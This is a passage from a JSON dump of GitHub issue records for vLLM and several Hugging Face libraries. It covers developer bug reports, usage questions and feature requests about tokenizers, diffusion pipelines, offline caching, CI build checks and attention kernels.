To use CUDA with multiprocessing, you must use the 'spawn' start method\n\n```\n\n### \ud83d\udcdd History of failing test\n\nhttps://buildkite.com/vllm/ci/builds/39127/steps/canvas?jid=019a84f5-0fbf-46f3-859f-42c02a2d3de1\n\n### CC List.\n\n_No response_", "url": "https://github.com/vllm-project/vllm/issues/28876", "state": "open", "labels": [ "ci-failure" ], "created_at": "2025-11-17T18:58:08Z", "updated_at": "2025-11-17T20:59:14Z", "comments": 1, "user": "jerryzh168" }, { "repo": "vllm-project/vllm", "number": 28868, "title": "[Bug]: When compiling with ranges, we should pass the range information to Inductor", "body": "### Your current environment\n\nmain\n\n### \ud83d\udc1b Describe the bug\n\nMight be more of a feature request. Context is that https://github.com/vllm-project/vllm/pull/24248 adds a new compile ranges API, where a user can specify which ranges to compile on.\n\nWe should tell Inductor how to constrain the compilation on the symints of the compile ranges\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28868", "state": "open", "labels": [ "bug", "torch.compile" ], "created_at": "2025-11-17T15:41:50Z", "updated_at": "2026-01-05T23:37:12Z", "comments": 1, "user": "zou3519" }, { "repo": "vllm-project/vllm", "number": 28866, "title": "[Usage]: When is going to be the next release?", "body": "Hi everyone,\n\nThank you for developing such a great tool!\n\nI was wondering when the next release is scheduled. I\u2019m interested in running Gemma3-text type architecture GGUF quantized models with VLLM. Are there any alternatives to do this with the latest release (v0.11.0)?\n\nI also noticed that you merged this PR with the working solution on October 9:\n\nhttps://github.com/vllm-project/vllm/pull/26189", "url": "https://github.com/vllm-project/vllm/issues/28866", "state": "open", "labels": [ "usage" ], "created_at": "2025-11-17T15:24:47Z", "updated_at": "2025-11-19T10:51:47Z", "comments": 1, "user": "Invalid-coder" }, { "repo": "huggingface/transformers", "number": 42241, "title": "How to use padding with Mistral?", "body": "I'm trying to understand how to use Mistral with `batch_size` > 1. One aspect of this is setting `padding=\"longest\"` in, e.g., `MistralCommonTokenizer.encode()`. But I'm getting `TypeError: 'set' object is not callable` when I try this. 
Example:\n```python\nimport torch\nfrom transformers import MistralForCausalLM, MistralCommonTokenizer\n\ntokenizer = MistralCommonTokenizer.from_pretrained(\"mistralai/Mistral-7B-Instruct-v0.3\")\nmodel = MistralForCausalLM.from_pretrained(\n \"mistralai/Mistral-7B-Instruct-v0.3\",\n dtype=torch.bfloat16,\n attn_implementation=\"sdpa\",\n device_map=\"auto\",\n)\n\nmessages = [\n \"You are a pirate chatbot who always responds in pirate speak!\",\n \"Who are you?\",\n]\n\nmodel_inputs = tokenizer.encode(messages, return_tensors=\"pt\", padding=\"longest\").to(\n model.device\n)\n```\n\nOutput:\n```\n---------------------------------------------------------------------------\nTypeError Traceback (most recent call last)\nCell In[1], line 17\n 5 model = MistralForCausalLM.from_pretrained(\n 6 \"mistralai/Mistral-7B-Instruct-v0.3\",\n 7 dtype=torch.bfloat16,\n 8 attn_implementation=\"sdpa\",\n 9 device_map=\"auto\",\n 10 )\n 12 messages = [\n 13 \"You are a pirate chatbot who always responds in pirate speak!\",\n 14 \"Who are you?\",\n 15 ]\n---> 17 model_inputs = tokenizer.encode(messages, return_tensors=\"pt\", padding=\"longest\").to(\n 18 model.device\n 19 )\n 21 generated_ids = model.generate(model_inputs, max_new_tokens=100, do_sample=True)\n 22 tokenizer.batch_decode(generated_ids)[0]\n\nFile ~/ad_hoc_analysis/src/asr_and_summarization/.venv/lib/python3.13/site-packages/transformers/tokenization_mistral_common.py:407, in MistralCommonTokenizer.encode(self, text, text_pair, add_special_tokens, padding, truncation, max_length, stride, pad_to_multiple_of, padding_side, return_tensors, verbose, **kwargs)\n 404 if text_pair:\n 405 raise ValueError(\"`MistralCommonTokenizer.encode` does not support `text_pair`.\")\n--> 407 padding_strategy, truncation_strategy, max_length, _ = self._get_padding_truncation_strategies(\n 408 padding=padding,\n 409 truncation=truncation,\n 410 max_length=max_length,\n 411 pad_to_multiple_of=pad_to_multiple_of,\n 412 verbose=verbose,\n 413 )\n 415 encoded_inputs = self._encode_plus(\n 416 text,\n 417 add_special_tokens=add_special_tokens,\n (...) 429 verbose=verbose,\n 430 )\n 432 return encoded_inputs[\"input_ids\"]\n\nFile ~/ad_hoc_analysis/src/asr_and_summarization/.venv/lib/python3.13/site-packages/transformers/tokenization_mistral_common.py:1034, in MistralCommonTokenizer._get_padding_truncation_strategies(self, padding, truncation, max_length, pad_to_multiple_of, verbose, **kwargs)\n 1031 max_length = self.model_max_length\n 1033 # Test if we have a padding token\n-> 1034 if padding_strategy != PaddingStrategy.DO_NOT_PAD and (self.pad_token is None or self.pad_token_id < 0):\n 1035 raise ValueError(\n 1036 \"Asking to pad but the tokenizer does not have a padding token. 
\"\n 1037 \"Please select a token to use as `pad_token` `(tokenizer.pad_token = tokenizer.eos_token e.g.)` \"\n 1038 \"or add a new pad token via `tokenizer.add_special_tokens({'pad_token': '[PAD]'})`.\"\n 1039 )\n 1041 # Check that we will truncate to a multiple of pad_to_multiple_of if both are provided\n\nFile ~/ad_hoc_analysis/src/asr_and_summarization/.venv/lib/python3.13/site-packages/transformers/tokenization_mistral_common.py:334, in MistralCommonTokenizer.pad_token(self)\n 329 @property\n 330 def pad_token(self) -> str:\n 331 \"\"\"\n 332 String associated to the padding token in the vocabulary.\n 333 \"\"\"\n--> 334 return self.convert_ids_to_tokens(self.pad_token_id)\n\nFile ~/ad_hoc_analysis/src/asr_and_summarization/.venv/lib/python3.13/site-packages/transformers/tokenization_mistral_common.py:548, in MistralCommonTokenizer.convert_ids_to_tokens(self, ids, skip_special_tokens)\n 546 tokens: list[str] = []\n 547 for token_id in ids:\n--> 548 if self._is_control_token(token_id) and skip_special_tokens:\n 549 continue\n 550 tokens.append(self.tokenizer.instruct_tokenizer.tokenizer.id_to_piece(token_id))\n\nFile ~/ad_hoc_analysis/src/asr_and_summarization/.venv/lib/python3.13/site-packages/transformers/tokenization_mistral_common.py:513, in MistralCommonTokenizer._is_control_token(self, token_id)\n 511 def _is_control_token(self, token_id: int) -> bool:\n 512 if self._tokenizer_type == MistralTokenizerType.spm:\n--> 513 return token_id in self.tokenizer.instruct_tokenizer.tokenizer._control_tokens()\n 514 elif self._tokenizer_type == MistralTokenizerType.tekken:\n 515 return token_id < self.tokenizer.instruct_tokenizer.tokenizer.num_special_tokens\n\nTypeError: 'set' object is not callable\n```\n\nEnv:\n```\n- `transformers` version: 4.57.1", "url": "https://github.com/huggingface/transformers/issues/42241", "state": "closed", "labels": [], "created_at": "2025-11-17T12:54:21Z", "updated_at": "2025-11-19T06:11:44Z", "user": "TopCoder2K" }, { "repo": "huggingface/chat-ui", "number": 1986, "title": "HI i would like to use default_headers={ \"X-HF-Bill-To\": \"org-name\" } in my chatui local deployment how i can??", "body": "Hi, \n\nSo i want to bill my Inference usage to my organization and like to pass default_headers={\n \"X-HF-Bill-To\": \"org-name\"\n } parameter how i can do that?? 
", "url": "https://github.com/huggingface/chat-ui/issues/1986", "state": "open", "labels": [ "support" ], "created_at": "2025-11-17T08:33:41Z", "updated_at": "2025-11-17T08:33:41Z", "user": "aditya-oss-prog" }, { "repo": "huggingface/diffusers", "number": 12672, "title": "How to set pipe \"requires_grad=true\"\uff1f", "body": "I have set the variable and the model \"requires_grad=true\" with the following:\n` pipe.transformer.requires_grad = True\n pipe.vae.requires_grad = True`\n`prev_sample = prev_sample.detach().requires_grad_(True)`\nbut the \"requires_grad\" of result by the pipe is still not true:\n `image_tar = pipe.vae.decode(prev_sample, return_dict=False)[0]`\n\"image_tar\" still can not requires_grad, so how to set pipe \"requires_grad=true\"\uff1f(all the operation is during inference stage.)", "url": "https://github.com/huggingface/diffusers/issues/12672", "state": "closed", "labels": [], "created_at": "2025-11-17T03:36:43Z", "updated_at": "2025-11-20T12:19:20Z", "user": "micklexqg" }, { "repo": "huggingface/diffusers", "number": 12669, "title": "Flux1-Dev inference with single file ComfyUI/SD-Forge Safetensors", "body": "Is it possible to run inference with diffusers using a single-file safetensors created for ComfyUI/SD-Forge?\n\nIt looks like FluxPipeline.from_single_file() might be intended for this purpose, but I'm getting the following errors:\n\n```\nimport torch\nfrom diffusers import FluxPipeline\n\npipe = FluxPipeline.from_single_file(\"./flux1-dev-fp8.safetensors\", torch_dtype=torch.float8_e4m3fn, use_safetensors=True)\n```\n\n```\nTraceback (most recent call last):\n File \"/home/user/flux/imgen.py\", line 9, in \n pipe = FluxPipeline.from_single_file(\"./flux1-dev-fp8.safetensors\", torch_dtype=torch.float8_e4m3fn, use_safetensors=True)\n File \"/home/user/.local/lib/python3.13/site-packages/huggingface_hub/utils/_validators.py\", line 114, in _inner_fn\n return fn(*args, **kwargs)\n File \"/home/user/.local/lib/python3.13/site-packages/diffusers/loaders/single_file.py\", line 509, in from_single_file\n loaded_sub_model = load_single_file_sub_model(\n library_name=library_name,\n ...<11 lines>...\n **kwargs,\n )\n File \"/home/user/.local/lib/python3.13/site-packages/diffusers/loaders/single_file.py\", line 127, in load_single_file_sub_model\n loaded_sub_model = create_diffusers_t5_model_from_checkpoint(\n class_obj,\n ...<4 lines>...\n local_files_only=local_files_only,\n )\n File \"/home/user/.local/lib/python3.13/site-packages/diffusers/loaders/single_file_utils.py\", line 2156, in create_diffusers_t5_model_from_checkpoint\n model.load_state_dict(diffusers_format_checkpoint)\n ~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/home/user/.local/lib/python3.13/site-packages/torch/nn/modules/module.py\", line 2641, in load_state_dict\n raise RuntimeError(\n ...<3 lines>...\n )\nRuntimeError: Error(s) in loading state_dict for T5EncoderModel:\n\tMissing key(s) in state_dict: \"encoder.embed_tokens.weight\". \n```\n\nI checked the safetensors file and the T5 encoder is present. 
However, it is named differently, which confuses diffusers.", "url": "https://github.com/huggingface/diffusers/issues/12669", "state": "open", "labels": [], "created_at": "2025-11-16T11:57:48Z", "updated_at": "2025-12-03T16:53:58Z", "comments": 12, "user": "ddpasa" }, { "repo": "huggingface/ai-deadlines", "number": 41, "title": "How to indicate ARR deadlines", "body": "Right now the yaml format assumes conferences with locations and dates, but ACL ARR has rolling deadlines not tied to a physical conference. We are largely operating around these deadlines. How can we incorporate these into this system?", "url": "https://github.com/huggingface/ai-deadlines/issues/41", "state": "open", "labels": [], "created_at": "2025-11-15T00:26:33Z", "updated_at": "2025-11-15T00:26:33Z", "user": "morrisalp" }, { "repo": "huggingface/diffusers", "number": 12662, "title": "question on stable_audio_transformer.py", "body": "Excuse me, I am learning the code of `class StableAudioDiTModel`, and I do not know what the argument `global_states_input_dim` is used for. It seems to be a mandatory component that is packed before the hidden_states sequence, and its default dim seems larger than the transformer inner_dim. What does that component mean? If it is used to take in additional conditions, that seems like it could be done in the encoder outside. And compared with the concatenation, I think it may be better to repeat the condition embedding to the sequence length and concat on hidden_dim. \n\nAnd what is the `sample_size: int = 1024,` parameter used for in the model creation? It seems unused during the `forward` call. \n\nThe func doc of `class StableAudioDiTModel:forward` says ``` encoder_attention_mask (`torch.Tensor` of shape `(batch_size, sequence_len)`, *optional*):```. Why is the shape of encoder_attention_mask batch_size X sequence_len instead of batch_size X encoder_sequence_len, to be identical with the shape of the input `encoder_hidden_states`? \n\nAnd why is the return value of this `forward` the direct `(hidden_states,)` and not `(hidden_states * attention_mask, )`? \n\nAbout the `class StableAudioDiTModel` forward, what are the shapes of the parameters `rotary_embedding` and `timestep`? \n\nWhy is the global_embedding concatenated before the hidden_states? I think hidden_states is what we want to generate during the DiT pipeline, while encoder_hidden_states is the condition signal, so global_embedding should be used to enrich the encoder_hidden_states. And concatenating the global_embedding before the input hidden_states sequence will change the input seq_length; according to [[1]](https://github.com/Stability-AI/stable-audio-tools/blob/main/docs/conditioning.md#input-concatenation), the concatenation should be done in the feature_dim direction, shouldn't it? \nIt also seems to use a normal LayerNorm layer instead of an adaLN layer?", "url": "https://github.com/huggingface/diffusers/issues/12662", "state": "open", "labels": [], "created_at": "2025-11-14T09:26:01Z", "updated_at": "2025-11-25T08:53:39Z", "comments": 1, "user": "JohnHerry" }, { "repo": "vllm-project/vllm", "number": 28717, "title": "[Usage]: Errors running vLLM docker in a closed environment with gpt-oss-120b on RTX 6000 Pro", "body": "### Your current environment\n\nCan't get vLLM to start with the below configuration. Seems to have issues loading the model's .safetensors.
Any ideas on what could be causing it?\n\nvllm version: 0.11.1\n\nCPU: Intel Xeon w7-2595X\nGPU: NVIDIA RTX PRO 6000 Blackwell Max-Q Workstation Edition\nModel: https://huggingface.co/openai/gpt-oss-120b/tree/main\n\nCommand:\ndocker run --rm --name vllm --gpus=all --runtime=nvidia -p 8000:8000 -e HF_HUB_OFFLINE=1 --ipc=host -v opt/models/cache/:/root/.cache/huggingface/hub vllm/vllm-openai:latest --model openai/gpt-oss-120b\n\nAlso tried: \ndocker run --rm --name vllm --gpus=all --runtime=nvidia -p 8000:8000 -e HF_HUB_OFFLINE=1 --ipc=host -v opt/models/cache/:/root/.cache/huggingface/hub vllm/vllm-openai:latest --model openai/gpt-oss-120b\n\nwith the same output.\n\n\nOutput:\nINFO 11-12 06:23:18 [__init__.py:216] Automatically detected platform cuda.\n\u001b[1;36m(APIServer pid=1)\u001b[0;0m INFO 11-12 06:23:21 [api_server.py:1839] vLLM API server version 0.11.0\n\u001b[1;36m(APIServer pid=1)\u001b[0;0m INFO 11-12 06:23:21 [utils.py:233] non-default args: {'model': 'openai/gpt-oss-120b'}\n\u001b[1;36m(APIServer pid=1)\u001b[0;0m INFO 11-12 06:23:21 [arg_utils.py:504] HF_HUB_OFFLINE is True, replace model_id [openai/gpt-oss-120b] to model_path [/root/.cache/huggingface/hub/models--openai--gpt-oss-120b/snapshots/b5c939de8f754692c1647ca79fbf85e8c1e70f8a]\n\u001b[1;36m(APIServer pid=1)\u001b[0;0m `torch_dtype` is deprecated! Use `dtype` instead!\n\u001b[1;36m(APIServer pid=1)\u001b[0;0m INFO 11-12 06:23:26 [model.py:547] Resolved architecture: GptOssForCausalLM\n\u001b[1;36m(APIServer pid=1)\u001b[0;0m ERROR 11-12 06:23:26 [config.py:278] Error retrieving safetensors: Repo id must be in the form 'repo_name' or 'namespace/repo_name': '/root/.cache/huggingface/hub/models--openai--gpt-oss-120b/snapshots/b5c939de8f754692c1647ca79fbf85e8c1e70f8a'. Use `repo_type` argument if needed., retrying 1 of 2\n\u001b[1;36m(APIServer pid=1)\u001b[0;0m ERROR 11-12 06:23:28 [config.py:276] Error retrieving safetensors: Repo id must be in the form 'repo_name' or 'namespace/repo_name': '/root/.cache/huggingface/hub/models--openai--gpt-oss-120b/snapshots/b5c939de8f754692c1647ca79fbf85e8c1e70f8a'. 
Use `repo_type` argument if needed.\n\u001b[1;36m(APIServer pid=1)\u001b[0;0m INFO 11-12 06:23:28 [model.py:1730] Downcasting torch.float32 to torch.bfloat16.\n\u001b[1;36m(APIServer pid=1)\u001b[0;0m INFO 11-12 06:23:28 [model.py:1510] Using max model len 131072\n\u001b[1;36m(APIServer pid=1)\u001b[0;0m INFO 11-12 06:23:29 [scheduler.py:205] Chunked prefill is enabled with max_num_batched_tokens=8192.\n\u001b[1;36m(APIServer pid=1)\u001b[0;0m INFO 11-12 06:23:29 [config.py:271] Overriding max cuda graph capture size to 992 for performance.\nINFO 11-12 06:23:31 [__init__.py:216] Automatically detected platform cuda.\n\u001b[1;36m(EngineCore_DP0 pid=308)\u001b[0;0m INFO 11-12 06:23:33 [core.py:644] Waiting for init message from front-end.\n\u001b[1;36m(EngineCore_DP0 pid=308)\u001b[0;0m INFO 11-12 06:23:33 [core.py:77] Initializing a V1 LLM engine (v0.11.0) with config: model='/root/.cache/huggingface/hub/models--openai--gpt-oss-120b/snapshots/b5c939de8f754692c1647ca79fbf85e8c1e70f8a', speculative_config=None, tokenizer='/root/.cache/huggingface/hub/models--openai--gpt-oss-120b/snapshots/b5c939de8f754692c1647ca79fbf85e8c1e70f8a', skip_tokenizer_init=False, tokenizer_mode=auto, revision=None, tokenizer_revision=None, trust_remote_code=False, dtype=torch.bfloat16, max_seq_len=131072, download_dir=None, load_format=auto, tensor_parallel_size=1, pipeline_parallel_size=1, data_parallel_size=1, disable_custom_all_reduce=False, quantization=mxfp4, enforce_eager=False, kv_cache_dtype=auto, device_config=cuda, structured_outputs_config=StructuredOutputsConfig(backend='auto', disable_fallback=False, disable_any_whitespace=False, disable_additional_properties=False, reasoning_parser='openai_gptoss'), observability_config=ObservabilityConfig(show_hidden_metrics_for_version=None, otlp_traces_endpoint=None, collect_detailed_traces=None), seed=0, served_model_name=/root/.cache/huggingface/hub/models--openai--gpt-oss-120b/snapshots/b5c939de8f754692c1647ca79fbf85e8c1e70f8a, enable_prefix_caching=True, chunked_prefill_enabled=True, pooler_config=None, compilation_config={\"level\":3,\"debug_dump_path\":\"\",\"cache_dir\":\"\",\"backend\":\"\",\"custom_ops\":[],\"splitting_ops\":[\"vllm.unified_attention\",\"vllm.unified_attention_with_output\",\"vllm.mamba_mixer2\",\"vllm.mamba_mixer\",\"vllm.short_conv\",\"vllm.linear_attention\",\"vllm.plamo2_mamba_mixer\",\"vllm.gdn_attention\",\"vllm.sparse_attn_indexer\"],\"use_inductor\":true,\"compile_sizes\":[],\"inductor_compile_config\":{\"enable_auto_functionalized_v2\":false},\"inductor_passes\":{},\"cudagraph_mode\":[2,1],\"use_cudagraph\":true,\"cudagraph_num_of_warmups\":1,\"cudagraph_capture_sizes\":[992,976,960,944,928,912,896,880,864,848,832,816,800,784,768,752,736,720,704,688,672,656,640,624,608,592,576,560,544,528,512,496,480,464,448,432,416,400,384,368,352,336,320,304,288,272,256,248,240,232,224,216,208,200,192,184,176,168,160,152,144,136,128,120,112,104,96,88,80,72,64,56,48", "url": "https://github.com/vllm-project/vllm/issues/28717", "state": "open", "labels": [ "usage" ], "created_at": "2025-11-14T08:49:48Z", "updated_at": "2025-11-20T15:45:21Z", "comments": 3, "user": "antonkarlsson1" }, { "repo": "huggingface/trl", "number": 4525, "title": "How to modify the advantage computation in GRPOTrainer", "body": "I\u2019m looking to customize the advantage computation used in the DAPO algorithm. 
Do I need to subclass the full GRPOTrainer to do this, or is it sufficient to overwrite the logic in _generate_and_score_completions, since that method appears to handle the advantage calculation?", "url": "https://github.com/huggingface/trl/issues/4525", "state": "open", "labels": [ "\u2753 question", "\ud83c\udfcb GRPO" ], "created_at": "2025-11-14T03:48:17Z", "updated_at": "2025-11-14T11:37:18Z", "user": "Tuziking" }, { "repo": "huggingface/transformers", "number": 42200, "title": "Request of rewriting implementation of prediction_step in trainer.py", "body": "### System Info\n\nAny system. Because it's a problem coming from source code.\n\n### Who can help?\n\n@SunMarc \n\n### Information\n\n- [ ] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\nHi, i am talking about an issue that was reported 5 years ago but still exists in 2025, specifically, 13th Nov, 2025.\n\nI quote one of the issues that was discussed before, ignored by sgugger. Please find the link below\nhttps://discuss.huggingface.co/t/cuda-out-of-memory-when-using-trainer-with-compute-metrics/2941\n\nWhen i was about to fine tune a LLM today, i ran into the same issue but i got saved by one folk's solution provided in this discussion.\n\nHow to reproduce (you should have a GPU, no quantization, just full fine tuning):\n\n1. Find a random decoder-only text2text LLM, let's say Qwen3 0.6B.\n\n2. Prepare a train dataset (>0 rows) and eval dataset (>850 rows).\n\n3. Set eval_on_start = True, either TrainingArguments or SFTConfig could work.\n\n4. Implement your own compute_metrics BUT DON'T implement preprocess_logits_for_metrics.\n5. start training (don't need deepspeed or accelerate, just trainer.train())\n\nWhat would happen?\nFirst it would go through the evaluation dataset because i set eval_on_start=True, the model would go really fast originally but then it would go extremely slow. Finally, you would get an error that says numpy is trying to allocate a ridiculously big array to memory.\n\n\"Image\"\n\nOne of the folk who seems to be inspired by example code provided the implementation of preprocess_logits_for_metrics, which solved problem i encountered perfectly. The evaluation run is done within 2 mins.\n\nWhy it would happen?\n\nI briefly go over the source code of evaluation_loop and i located prediction_step.\n\nprediction_step says it would return a tuple of three optional torch.Tensor (loss, logits, label).\n\n\"Image\"\n\nBut most of the time, the returned logits is a tuple.\n\nWhy?\n\nif you look at the the function that processes logits before logits is returned:\n\n\"Image\"\n\nThis function would receive all kinds of \"tensors\". The type of \"tensors\" could be list, tuple, Mapping or torch.Tensor.\n\nDoes it change the variable, called \"tensors\", from other data types to torch.Tensor?\n\nNo.\n\ntype(tensors)(........) would preserve the original type of tensors. It means if the variable \"tensors\" (i hate this variable name because it is misleading and confusing) is a tuple, after this function, it's still a tuple!!!!!\n\nIt's a recursive function btw. I would love doing recursion in programming competition, but not in huggingface codebase!!! 
It also implies that the input of nested_detach can be complexly nested, like ([],())\n\nSo this function doesn't guarantee that the logits are a torch.Tensor.\n\nNor does the part of prediction_step that runs before nested_detach is called\n\n\"Image\"\n\nSo the logits are not always a torch.Tensor, which contradicts what the type hint says. What did the developers do?\n\nThey developed preprocess_logits_for_metrics.\nSo that users could fix it ON THEIR OWN IMPLEMENTATION.\n\n(preprocess_logits_for_metrics is called within evaluation_loop to clean up the mess, specifically the logits, returned by prediction_step())\n\"Image\"\n\nIt's such a lazy fix. Why is a regular user expected to implement their own preprocess_logits_for_metrics to deal with a poorly-designed prediction_step?\n\nIt has been 5 years since this was first reported...\n\nIf a user-defined compute_metrics is not provided to Trainer or SFTTrainer, prediction_step returns (loss, None, None), which skips the whole problem; this is why users said the \"slow evaluation\" issue is gone when they don't provide compute_metrics.\n\nI would like to make a Pull Request to fix it but I don't have enough time and energy to do this massive amount of work.\n\nA temporary fix is to let users know that when they write their own compute_metrics, they also have to implement preprocess_logits_for_metrics. Different models would need different implementations, but for a text2text decoder-only LLM:\n\n\"Image\"\n\n(Another thing is that the variable called ", "url": "https://github.com/huggingface/transformers/issues/42200", "state": "open", "labels": [ "Good Second Issue", "bug" ], "created_at": "2025-11-14T00:13:40Z", "updated_at": "2025-12-18T14:29:32Z", "comments": 3, "user": "Yacklin" }, { "repo": "huggingface/transformers", "number": 42197, "title": "Attempt to access socket despite HF_HUB_OFFLINE = 1 if cache warmed outside current process", "body": "### System Info\n\n- `transformers` version: 4.57.1\n- Platform: Linux-6.6.84.1-microsoft-standard-WSL2-x86_64-with-glibc2.35\n- Python version: 3.13.0\n- Huggingface_hub version: 0.36.0\n- Safetensors version: 0.6.2\n- Accelerate version: not installed\n- Accelerate config: not found\n- DeepSpeed version: not installed\n- PyTorch version (accelerator?): 2.9.1+cpu (NA)\n- Tensorflow version (GPU?): not installed (NA)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Using distributed or parallel set-up in script?: No\n\n### Who can help?\n\n@ydshieh I have created a reproducible example of the issue I mentioned in https://github.com/huggingface/transformers/issues/41311#issuecomment-3508674325.\n\n### Information\n\n- [ ] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\nReproducible example: https://github.com/fr1ll/HF_HUB_OFFLINE\n\n\nWarming the cache in a subprocess, then disabling sockets, then loading the same model should work.\nHowever, it fails with an attempt to access a socket and then \"Can't load\" errors.\n\nThe script named `subprocess-warm_then_offline-load.py` reproduces this error.\n\nInterestingly, warming the cache in process, then disabling sockets, then loading the same model works.\nThis is reproduced in `inprocess-warm_then_offline-load.py` in the repo
above.\n\n### Expected behavior\n\nWhen a model has already been loaded into the cache (\"warm cache\"), if `HF_OFFLINE_MODE` = `\"1\"`, a Transformers pipeline should be able to load the model without accessing any network sockets.", "url": "https://github.com/huggingface/transformers/issues/42197", "state": "closed", "labels": [ "Good Second Issue", "bug" ], "created_at": "2025-11-13T21:38:29Z", "updated_at": "2025-11-24T09:33:54Z", "comments": 6, "user": "fr1ll" }, { "repo": "vllm-project/vllm", "number": 28646, "title": "[Feature][P2]: Implement CI Build Time and Size Guards", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\n### Description\nOnce we optimize the Docker build, we need to prevent regressions. Create CI checks that fail if build time exceeds thresholds or if image size grows beyond acceptable limits. Also set up monitoring dashboards.\n\n### What You'll Do\n1. Create Python scripts to check image metrics:\n - `check-image-size.py` (extend existing wheel size checker)\n - `check-build-time.py`\n - `check-image-layers.py`\n2. Add these checks to CI pipeline after image build\n3. Set appropriate thresholds (configurable)\n4. Create Buildkite annotations for warnings\n5. Set up CloudWatch dashboard for metrics (optional)\n\n### Deliverables\n- [ ] Python scripts for checking metrics\n- [ ] Integration into test-template-ci.j2\n- [ ] Configurable thresholds via environment variables\n- [ ] Documentation on how to adjust thresholds\n- [ ] CloudWatch dashboard (optional)\n\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28646", "state": "open", "labels": [ "feature request", "ci/build" ], "created_at": "2025-11-13T12:50:34Z", "updated_at": "2025-11-13T18:55:29Z", "comments": 0, "user": "rzabarazesh" }, { "repo": "huggingface/diffusers", "number": 12650, "title": "Question about the `# Copied from` system", "body": "Hi team! \ud83d\udc4b\n\nWhile working on improving docstrings and type hints across scheduler files (issue #9567), I've noticed the `# Copied from` pattern used extensively throughout the codebase.\n\nExamples:\n- Functions like `betas_for_alpha_bar` are duplicated across multiple schedulers\n- Output classes like `DDPMSchedulerOutput` are copied with name replacements (e.g., DDPM->EulerDiscrete)\n\nMy question: What's the rationale behind this duplication system instead of:\n1. Using a shared utils.py or common.py file for common functions\n2. Using class inheritance for similar Output classes\n\nI understand there might be good architectural reasons (module independence, API stability, avoiding circular dependencies, etc.), but this isn't documented anywhere that I could find.\n\nSuggested action: Regardless of the answer, I think we should either:\n- Option A: Refactor to use inheritance/shared utilities (if the current system is legacy)\n- Option B: Document this design decision in:\n  - A CONTRIBUTING.md or architecture doc\n  - Comments in the utils/check_copies.py script itself\n  - Another README in the diffusers directory\n\nThis would help future contributors (like me! \ud83d\ude05) understand why this pattern exists and how to work with it properly when improving documentation. 
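\n\nFor readers who have not seen the pattern, this is the shape of the marker being discussed -- an illustrative, abbreviated example of the convention (not an exact line from the repo); `utils/check_copies.py` / `make fix-copies` then keep the copy in sync with its source, applying the name replacement:\n\n```python\nfrom diffusers.utils import BaseOutput\n\n# Copied from diffusers.schedulers.scheduling_ddpm.DDPMSchedulerOutput with DDPM->EulerDiscrete\nclass EulerDiscreteSchedulerOutput(BaseOutput):\n    ...\n```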
What do you think?\n\nThanks for maintaining such a great library! \ud83d\ude80", "url": "https://github.com/huggingface/diffusers/issues/12650", "state": "open", "labels": [], "created_at": "2025-11-13T11:53:22Z", "updated_at": "2025-12-21T22:44:03Z", "comments": 3, "user": "delmalih" }, { "repo": "huggingface/transformers", "number": 42179, "title": "Add TileLang Kernel Support", "body": "### Feature request\n\nI would like to propose adding support for TileLang kernel in the transformers library. TileLang is a modular approach for writing attention kernels that could provide flexibility and performance benefits.\ngithub link: https://github.com/tile-ai/tilelang\n- Add TileLang as an optional attention backend\n- Provide configuration options similar to existing attention mechanisms\n- Ensure compatibility with existing model architectures\n- Add proper multi-GPU support and synchronization\n\n### Motivation\n\n- Enhanced Modularity\nTileLang offers a more modular approach to writing attention kernels, making it easier for researchers and developers to modify and optimize the implementation for specific use cases.\n\n- Performance Comparison\nIntegrating TileLang would allow users to benchmark its performance directly against existing attention implementations, such as Flex Attention and Flash Attention. This would foster a better understanding of how different kernels can impact model performance and efficiency.\n\n- Community Engagement\nSupporting TileLang in the Transformers library would attract a broader community of developers interested in optimizing transformer models, thus enhancing collaboration and innovation.\n\n- Flexibility\nTileLang's architecture is designed for ease of modification, allowing users to experiment with and refine attention mechanisms more effectively.\n\n### Your contribution\n\nI've experimented with TileLang kernel on transformers models and found it works well in single-GPU scenarios. However, when enabling multi-GPU inference using `device_map='auto'`, I encounter NaN tensors. This may be related to tensor synchronization issues in distributed settings.\n\nI'm willing to help with testing and potentially contributing to the implementation once the multi-GPU synchronization issue is understood and resolved.\n\nI also have 3 questions:\n1. Is there any existing plan or roadmap for TileLang integration?\n2. Are there specific guidelines for adding new attention backends?\n3. What would be the recommended approach for handling multi-GPU synchronization in custom kernels?\n", "url": "https://github.com/huggingface/transformers/issues/42179", "state": "open", "labels": [ "Feature request" ], "created_at": "2025-11-13T11:38:33Z", "updated_at": "2025-11-13T11:38:33Z", "comments": 0, "user": "crownz248" }, { "repo": "huggingface/tokenizers", "number": 1885, "title": "Feature request: Characters delimiter argument", "body": "I wish to develop a k-mer-character-based BPE tokenizer using your beautiful Rust package, for genomic applications. Unfortunately, it doesn't seem to support defining a characters delimiter. As I see it, it is a pretty straightforward change, instead of iterating a word by character, first split it by the delimiter and then iterate. Also, when merges are computed, in the string representation the character delimiter should also be considered. In that way, a multi-character word splitting could have been made feasible. 
